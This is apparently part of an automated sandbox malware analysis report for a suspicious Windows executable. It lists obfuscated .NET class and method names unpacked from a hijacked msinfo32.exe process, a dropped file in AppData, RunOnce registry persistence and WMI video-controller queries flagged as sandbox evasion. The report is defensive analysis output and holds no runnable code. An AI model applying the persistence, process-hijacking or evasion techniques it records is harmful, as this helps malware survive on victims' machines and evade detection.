            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.csHigh entropy of concatenated method names: '_76ue0cuKcBpfXAu8ipumvqgEKSp8NnNnoqHE3rHbHe2VLqSQlmtIs4wPoLY44UNKWfuSaqowTSysjKv', 'c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn', 'EvpRQwgg6KAcyCkfeilUXpluSzRTLr6TkUiRdKrol3cpqzcKWYYm7Gaoz3wWIhop7d8DpyEB5hNDNv0', 'oQiDcpvgyH3QuS4oBw5v06rUJMfQDLGL5OimI9anQNz1BASyMWXqOh92wOpNNRE9iPC4xId70UPMG0J', '_0iyS32DUSXmCpuszhHSb669bMzLd2Jp70do47JmXB5ip2OFj8CJIHRymPHLctrCSjMEOvYBHEri4CVx', 'autHXiFJA47vTPjQs8gFiLxKYYmNqb01HeKmYtaoD7wtHhK4XKRCvbQ9NAxtEnrAOn5OSmQamUbEgqO', 'xPFsGTOs42kZAx8Dbk9vKX6ypjMK2O3GhjZexqWf7PnaVtcyN15PjFLS1gOUWhtZqrjQMMkK9pT5mdN', 'ZtDyWNs1v0G2zHttJoZnLShkqGQ9ehWMHaU5do6yYYCm1yaim9tgQBztfh34z8a6GYw8UtEu7X7GZXF', 'IajCRXKpWaSkdUI9LIxIN', 'sbTD79e9IYPCzzS6YL40G'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, TZrzPbjLFFrbDwwIGB0vNnvCmpznQ3zQNtXcbMKKxJg5prbr8Zlj36BoaWOHWNOJCmMUgm8ceTkqecS30KecypXPUjNpn3nyL.csHigh entropy of concatenated method names: 'Nd3j5YRJl0k9D3V06qrWzS2GTqP43pOAoaKOU30fkWcvnMxLYjg4DD4FIhBPGiYkJowcVY6tf6quLPWMxXvJZGrg5huFQmX8T', 'y5qQJHJViSl5sI78N77ScXb8FrUOc5Xik3er6pZ', '_59Db4NilXSNjJDA0hNgSEoJ7a5A58VRaRPG2gba', 'EaS9LNVTXAsBeraG2Hj51MQSAH', '_37z0KAv5mkqEMe99iD5vvDKC9W', 'DuUdHU4JCBITGRNZwZIGhNQfMR', 'LsUUKIdDdQxQfn2Xa9XaVSGEkU', 'TTOGSCnm6JQXSXng6C5FLTImE7', 'PGcJwbPc188aoXAjUPu2cDrftm', 'PAyIhvojvsjSoRuKh8D9iqpi1R'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, t8EoroTELBJo02OPzsY8s3nMCnSzvrepSobpfejBHOH6CmxDbazfhjFmufKk6S9itNTJx.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'TN6mI57CI7qQPQQN', 'CEGlSs6jTnJlUo61', 'LJxnRx17l6VdZH7r', 'QMZVndWUk0mYLGDC'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.csHigh entropy of concatenated method names: 'QE1eP3w5bZYMc1CkK9DkU', '_1grTmSN1N8xDGNJc6Kmem', '_3gAAVqCSctZdKISq2n3HG', 'kU2ABuX205jRfDYWQK5a5', 'wBv5irAiNPf9wwZLIabZh', 'juHK2LPCAOMhEtJix3ng5', 'K7MqNdl5GfbGu0u3ZXwFy', 'CCD7rfTr1tkTaap5KtNyZ', 'PwSlJAXd5toapo8LEOXsh', 'rlvlkDkwl3jQStuXbMxnp'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, f7PGrVhFtmc98BagCIsr0.csHigh entropy of concatenated method names: 'cBFcsrNxw006MB6507Xpw', '_5cc8tJbvdpF1gF83dUV9LAx5hY0EB8Zax1NISdkMbB9feR3l60b2NvWQ09wKf2amvQ', 'ywXk1J7Dy3wVB9POxn2a9CwTj67i7wDpzXBVbej80g7Dg0wxSlir6UwtbjOtwh01LU', 'WOaXxgL0KqKB1gBQYBSstKSMyN6Wsdi3ejoBTUyWCY6ssFKoRIHR', 'EBpYhJmki7M2gP5cmx05KTl5NsGEkRnfjmU1f05zr79eCkm1kmXp'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csHigh entropy of concatenated method names: 'DJx04PFoTjeZ8bhb0ohfe', 'kyjh4TTow4cb5WSF7ynRUvtQMSJwiIL4BMhMeCJJX8R7QW1tFrRY', 'PWOZNwxYZK6pWZnbrNkt9qsFf7kPtQkv3qlChpmfwDH0eWNylPEh', 'JfwjyvAScALXOBlHR9UeR9D6ijc3vl50iHvWzx4voM36biQsHm5r', 'dqsJmzP9AYoWquuvMrFqRE0K52MUOGxjhxk49WtBFN0nwX2RwNyv'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, zWPjKgTxgsMMgESteKvSfqYGaiyRCoD8ZzQ2q89Ro3stWNo91UE19EdfLBcfWC.csHigh entropy of concatenated method names: 'PjU9xrsPTshkeVVvNIqtT60PQTPipiM9hwutvKnXHBr4F1qdehpBZsXWB3yJ6o', 'Qs0d4DdYlgkiT0KB3q6p8srBd1WkuVme013hSdZtyjnHAFCm6aYprH3rxoTt72', 'eT1qE8kXV7vlM2Y4rQNgJwKC83RLpZjNKPl2uc1uUgvaqjLun6bWrGrqsYCGnt', 'wlc3ExxvzfcAH9PG', 'eBukHsC7ZTDNZ4fe', 'ec12rnPEdOhYFSMW', '_0hR913pxQbhv1IkG', 'AiKdsTuvmTnb2fCg', 'bvBiYnC7h0t7IzNr', 'ZV86ubCctZ9wOlH1'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csHigh entropy of concatenated method names: 'rLzKD21CxC8XSPSMBsRd5gefBCb75ZuFdOLyhb1o2P8WcGX6gSd2yBLHyfKLCB', 'uUBs02d3t9rmzi1gJPVE9Uip5HHNT3Zyf4wh2mfIxOxpN9sYiM9RE3eoydV6Jr', 'lF9q4oBN4qkl6fgZjpmhbP3fJnYiOyfE77VuXiqDwz7uDqH', 'PQ1XF1GodYVNj9qQ1ixxUjwTWoM5Nc23UawMC6IN320vUnh', '_8GHcQ3MY7rzKKA5VVrsP1igtRDC7cf6B251CS4hul4slV54', 'sz11TXBKX7KOhOwZgzpkwPXEEa71kCWhkEj8634ecPagGi4', 'xlAhD2SBsBk4x2L6OeWf3DcViuRRE2qNHxHOMxeYbXz9py8', 'EEjUe3mhctf021zvOVBcW7GZ4erCSVYHZSCyqt4KTyk7i03', '_8l6xB8jm62k0ewgROiR4QVXv4h6ba3pdVtNb4khSNhQTP7n', 'BKARn0FYI04TjR9YzVJ0KERtWzvspI9QhzjcD9re6a6ODC6'
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.csHigh entropy of concatenated method names: '_76ue0cuKcBpfXAu8ipumvqgEKSp8NnNnoqHE3rHbHe2VLqSQlmtIs4wPoLY44UNKWfuSaqowTSysjKv', 'c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn', 'EvpRQwgg6KAcyCkfeilUXpluSzRTLr6TkUiRdKrol3cpqzcKWYYm7Gaoz3wWIhop7d8DpyEB5hNDNv0', 'oQiDcpvgyH3QuS4oBw5v06rUJMfQDLGL5OimI9anQNz1BASyMWXqOh92wOpNNRE9iPC4xId70UPMG0J', '_0iyS32DUSXmCpuszhHSb669bMzLd2Jp70do47JmXB5ip2OFj8CJIHRymPHLctrCSjMEOvYBHEri4CVx', 'autHXiFJA47vTPjQs8gFiLxKYYmNqb01HeKmYtaoD7wtHhK4XKRCvbQ9NAxtEnrAOn5OSmQamUbEgqO', 'xPFsGTOs42kZAx8Dbk9vKX6ypjMK2O3GhjZexqWf7PnaVtcyN15PjFLS1gOUWhtZqrjQMMkK9pT5mdN', 'ZtDyWNs1v0G2zHttJoZnLShkqGQ9ehWMHaU5do6yYYCm1yaim9tgQBztfh34z8a6GYw8UtEu7X7GZXF', 'IajCRXKpWaSkdUI9LIxIN', 'sbTD79e9IYPCzzS6YL40G'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, TZrzPbjLFFrbDwwIGB0vNnvCmpznQ3zQNtXcbMKKxJg5prbr8Zlj36BoaWOHWNOJCmMUgm8ceTkqecS30KecypXPUjNpn3nyL.csHigh entropy of concatenated method names: 'Nd3j5YRJl0k9D3V06qrWzS2GTqP43pOAoaKOU30fkWcvnMxLYjg4DD4FIhBPGiYkJowcVY6tf6quLPWMxXvJZGrg5huFQmX8T', 'y5qQJHJViSl5sI78N77ScXb8FrUOc5Xik3er6pZ', '_59Db4NilXSNjJDA0hNgSEoJ7a5A58VRaRPG2gba', 'EaS9LNVTXAsBeraG2Hj51MQSAH', '_37z0KAv5mkqEMe99iD5vvDKC9W', 'DuUdHU4JCBITGRNZwZIGhNQfMR', 'LsUUKIdDdQxQfn2Xa9XaVSGEkU', 'TTOGSCnm6JQXSXng6C5FLTImE7', 'PGcJwbPc188aoXAjUPu2cDrftm', 'PAyIhvojvsjSoRuKh8D9iqpi1R'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, t8EoroTELBJo02OPzsY8s3nMCnSzvrepSobpfejBHOH6CmxDbazfhjFmufKk6S9itNTJx.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'TN6mI57CI7qQPQQN', 'CEGlSs6jTnJlUo61', 'LJxnRx17l6VdZH7r', 'QMZVndWUk0mYLGDC'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.csHigh entropy of concatenated method names: 'QE1eP3w5bZYMc1CkK9DkU', '_1grTmSN1N8xDGNJc6Kmem', '_3gAAVqCSctZdKISq2n3HG', 'kU2ABuX205jRfDYWQK5a5', 'wBv5irAiNPf9wwZLIabZh', 'juHK2LPCAOMhEtJix3ng5', 'K7MqNdl5GfbGu0u3ZXwFy', 'CCD7rfTr1tkTaap5KtNyZ', 'PwSlJAXd5toapo8LEOXsh', 'rlvlkDkwl3jQStuXbMxnp'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, f7PGrVhFtmc98BagCIsr0.csHigh entropy of concatenated method names: 'cBFcsrNxw006MB6507Xpw', '_5cc8tJbvdpF1gF83dUV9LAx5hY0EB8Zax1NISdkMbB9feR3l60b2NvWQ09wKf2amvQ', 'ywXk1J7Dy3wVB9POxn2a9CwTj67i7wDpzXBVbej80g7Dg0wxSlir6UwtbjOtwh01LU', 'WOaXxgL0KqKB1gBQYBSstKSMyN6Wsdi3ejoBTUyWCY6ssFKoRIHR', 'EBpYhJmki7M2gP5cmx05KTl5NsGEkRnfjmU1f05zr79eCkm1kmXp'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csHigh entropy of concatenated method names: 'DJx04PFoTjeZ8bhb0ohfe', 'kyjh4TTow4cb5WSF7ynRUvtQMSJwiIL4BMhMeCJJX8R7QW1tFrRY', 'PWOZNwxYZK6pWZnbrNkt9qsFf7kPtQkv3qlChpmfwDH0eWNylPEh', 'JfwjyvAScALXOBlHR9UeR9D6ijc3vl50iHvWzx4voM36biQsHm5r', 'dqsJmzP9AYoWquuvMrFqRE0K52MUOGxjhxk49WtBFN0nwX2RwNyv'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, zWPjKgTxgsMMgESteKvSfqYGaiyRCoD8ZzQ2q89Ro3stWNo91UE19EdfLBcfWC.csHigh entropy of concatenated method names: 'PjU9xrsPTshkeVVvNIqtT60PQTPipiM9hwutvKnXHBr4F1qdehpBZsXWB3yJ6o', 'Qs0d4DdYlgkiT0KB3q6p8srBd1WkuVme013hSdZtyjnHAFCm6aYprH3rxoTt72', 'eT1qE8kXV7vlM2Y4rQNgJwKC83RLpZjNKPl2uc1uUgvaqjLun6bWrGrqsYCGnt', 'wlc3ExxvzfcAH9PG', 'eBukHsC7ZTDNZ4fe', 'ec12rnPEdOhYFSMW', '_0hR913pxQbhv1IkG', 'AiKdsTuvmTnb2fCg', 'bvBiYnC7h0t7IzNr', 'ZV86ubCctZ9wOlH1'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csHigh entropy of concatenated method names: 'rLzKD21CxC8XSPSMBsRd5gefBCb75ZuFdOLyhb1o2P8WcGX6gSd2yBLHyfKLCB', 'uUBs02d3t9rmzi1gJPVE9Uip5HHNT3Zyf4wh2mfIxOxpN9sYiM9RE3eoydV6Jr', 'lF9q4oBN4qkl6fgZjpmhbP3fJnYiOyfE77VuXiqDwz7uDqH', 'PQ1XF1GodYVNj9qQ1ixxUjwTWoM5Nc23UawMC6IN320vUnh', '_8GHcQ3MY7rzKKA5VVrsP1igtRDC7cf6B251CS4hul4slV54', 'sz11TXBKX7KOhOwZgzpkwPXEEa71kCWhkEj8634ecPagGi4', 'xlAhD2SBsBk4x2L6OeWf3DcViuRRE2qNHxHOMxeYbXz9py8', 'EEjUe3mhctf021zvOVBcW7GZ4erCSVYHZSCyqt4KTyk7i03', '_8l6xB8jm62k0ewgROiR4QVXv4h6ba3pdVtNb4khSNhQTP7n', 'BKARn0FYI04TjR9YzVJ0KERtWzvspI9QhzjcD9re6a6ODC6'
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.csHigh entropy of concatenated method names: '_76ue0cuKcBpfXAu8ipumvqgEKSp8NnNnoqHE3rHbHe2VLqSQlmtIs4wPoLY44UNKWfuSaqowTSysjKv', 'c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn', 'EvpRQwgg6KAcyCkfeilUXpluSzRTLr6TkUiRdKrol3cpqzcKWYYm7Gaoz3wWIhop7d8DpyEB5hNDNv0', 'oQiDcpvgyH3QuS4oBw5v06rUJMfQDLGL5OimI9anQNz1BASyMWXqOh92wOpNNRE9iPC4xId70UPMG0J', '_0iyS32DUSXmCpuszhHSb669bMzLd2Jp70do47JmXB5ip2OFj8CJIHRymPHLctrCSjMEOvYBHEri4CVx', 'autHXiFJA47vTPjQs8gFiLxKYYmNqb01HeKmYtaoD7wtHhK4XKRCvbQ9NAxtEnrAOn5OSmQamUbEgqO', 'xPFsGTOs42kZAx8Dbk9vKX6ypjMK2O3GhjZexqWf7PnaVtcyN15PjFLS1gOUWhtZqrjQMMkK9pT5mdN', 'ZtDyWNs1v0G2zHttJoZnLShkqGQ9ehWMHaU5do6yYYCm1yaim9tgQBztfh34z8a6GYw8UtEu7X7GZXF', 'IajCRXKpWaSkdUI9LIxIN', 'sbTD79e9IYPCzzS6YL40G'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeFile created: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
